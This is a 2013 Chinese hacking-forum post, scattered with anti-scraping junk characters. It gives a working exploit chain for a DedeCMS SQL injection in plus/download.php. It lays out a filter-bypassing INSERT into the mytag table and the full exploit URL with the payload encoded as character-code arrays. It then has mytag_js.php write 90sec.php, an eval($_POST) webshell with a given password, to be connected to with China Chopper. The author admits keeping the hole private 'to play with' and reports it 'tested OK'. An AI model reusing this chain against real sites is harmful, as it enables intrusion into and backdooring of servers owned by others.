本帖最后由 土豆 于 2013-6-10 14:41 编辑
1 O; D- S2 n/ Y D5 M! W7 G2 H: j8 @3 K
* }, F; L, ^9 v" _. c
作者:鬼哥6 W; `" _2 M' N, g# [, V5 c# C9 s( X
! c9 Y( a* c$ ?' V0 t+ ^: U* @
看贴不回,没JJ" M7 U P- E6 p
7 P+ m# B0 X: _& w7 I; @; c$ [
漏洞大家都知道是哪个。
" `7 @# }2 \9 W# q/ D- W" V r% w) F# o8 \( K4 M& e2 A- Q
其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
4 l+ q' G& V7 s4 L: J7 p h0 _: p% h) @* q9 F( W# E8 V) m
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。
8 s; x3 n5 x4 s2 l, Z1 r3 ~) K2 s
8 Z9 P7 `3 j! j1 Q& s刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?
# U) m# R v/ d0 ]& `5 T
+ S" J5 D# X+ G5 c Q* ?getshell 很容易 。 既然刚发出来的是 sql方法getshell 我也看到几个人发了sql增加表mytag的内容。
1 B+ K: h( H4 ]2 e% T8 _2 Z+ q
" L& T4 _7 h. Y) U9 R i但是测试了下。。失败- ?8 D) {( [/ |$ ~3 g3 E, W1 L' C
+ q' r. J2 ~& P) Z2 F3 f5 _1 R5 L( J原因: 用的语句是update 很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴 错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
# {1 ~2 r8 d6 r9 t/ ^1 ]
3 t) T" |0 |+ h- n3 E" Z3 v构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`1 T- U+ b, x. m9 i7 p: c
9 H8 V5 A7 _! b% c1 s2 m+ vEXP: ^$ g6 r! O- p
0 r0 e& u( z {% z% Rhttp://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96( s0 \2 b( R; Q' w
$ m7 e+ [. ~ ~% P0 M& ]8 s2 a5 L, f1 r L
成功增加。& O5 s" z' f) a3 X. I% N" m
: B( E* i! v1 ?. |访问http://www.xxx.com/plus/mytag_js.php?aid=9013- W1 R q6 f8 a/ a$ e W; S. N% _
生成一句话木马.
8 m2 u% G4 X" @' `0 v4 P菜刀连接 http://www.xxx.com/plus/90sec.php 密码 guige' p; m, i* d2 ]! Z- i! K
`4 r* J8 T" u5 E: F8 x# F测试OK。
3 B' f# ^( j) R4 q: m" B6 g z# U" ]) N: w' F& p4 a
" G0 _ |( |9 P |
发表于 2013-6-10 16:49:18
收藏
支持
反对